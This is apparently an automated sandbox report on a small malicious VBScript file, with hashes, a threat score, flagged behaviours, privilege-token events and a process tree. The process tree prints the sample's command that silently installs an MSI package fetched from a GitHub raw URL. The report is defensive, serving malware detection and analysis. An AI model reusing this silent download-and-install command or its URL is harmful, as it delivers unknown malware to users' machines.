41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-01-2025 03:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs
Size

512B
MD5

bcc1d6a3c9aeec994cd31f86ada37ae6
SHA1

0b7bb7af96d842cfbb7a89793a4292fec4289a8c
SHA256

41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64
SHA512

8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7

Score

7^/10

Malware Config

Signatures

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2308	msiexec.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	3048	msiexec.exe
6	3048	msiexec.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2308	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2308	msiexec.exe
Token: SeRestorePrivilege	3048	msiexec.exe
Token: SeTakeOwnershipPrivilege	3048	msiexec.exe
Token: SeSecurityPrivilege	3048	msiexec.exe
Token: SeCreateTokenPrivilege	2308	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2308	msiexec.exe
Token: SeLockMemoryPrivilege	2308	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2308	msiexec.exe
Token: SeMachineAccountPrivilege	2308	msiexec.exe
Token: SeTcbPrivilege	2308	msiexec.exe
Token: SeSecurityPrivilege	2308	msiexec.exe
Token: SeTakeOwnershipPrivilege	2308	msiexec.exe
Token: SeLoadDriverPrivilege	2308	msiexec.exe
Token: SeSystemProfilePrivilege	2308	msiexec.exe
Token: SeSystemtimePrivilege	2308	msiexec.exe
Token: SeProfSingleProcessPrivilege	2308	msiexec.exe
Token: SeIncBasePriorityPrivilege	2308	msiexec.exe
Token: SeCreatePagefilePrivilege	2308	msiexec.exe
Token: SeCreatePermanentPrivilege	2308	msiexec.exe
Token: SeBackupPrivilege	2308	msiexec.exe
Token: SeRestorePrivilege	2308	msiexec.exe
Token: SeShutdownPrivilege	2308	msiexec.exe
Token: SeDebugPrivilege	2308	msiexec.exe
Token: SeAuditPrivilege	2308	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2308	msiexec.exe
Token: SeChangeNotifyPrivilege	2308	msiexec.exe
Token: SeRemoteShutdownPrivilege	2308	msiexec.exe
Token: SeUndockPrivilege	2308	msiexec.exe
Token: SeSyncAgentPrivilege	2308	msiexec.exe
Token: SeEnableDelegationPrivilege	2308	msiexec.exe
Token: SeManageVolumePrivilege	2308	msiexec.exe
Token: SeImpersonatePrivilege	2308	msiexec.exe
Token: SeCreateGlobalPrivilege	2308	msiexec.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2308	2688	WScript.exe	31
PID 2688 wrote to memory of 2308	2688	WScript.exe	31
PID 2688 wrote to memory of 2308	2688	WScript.exe	31
PID 2688 wrote to memory of 2308	2688	WScript.exe	31
PID 2688 wrote to memory of 2308	2688	WScript.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn
  2⤵
  - Use of msiexec (install) with remote resource
  - Suspicious use of AdjustPrivilegeToken
  PID:2308

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3048

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads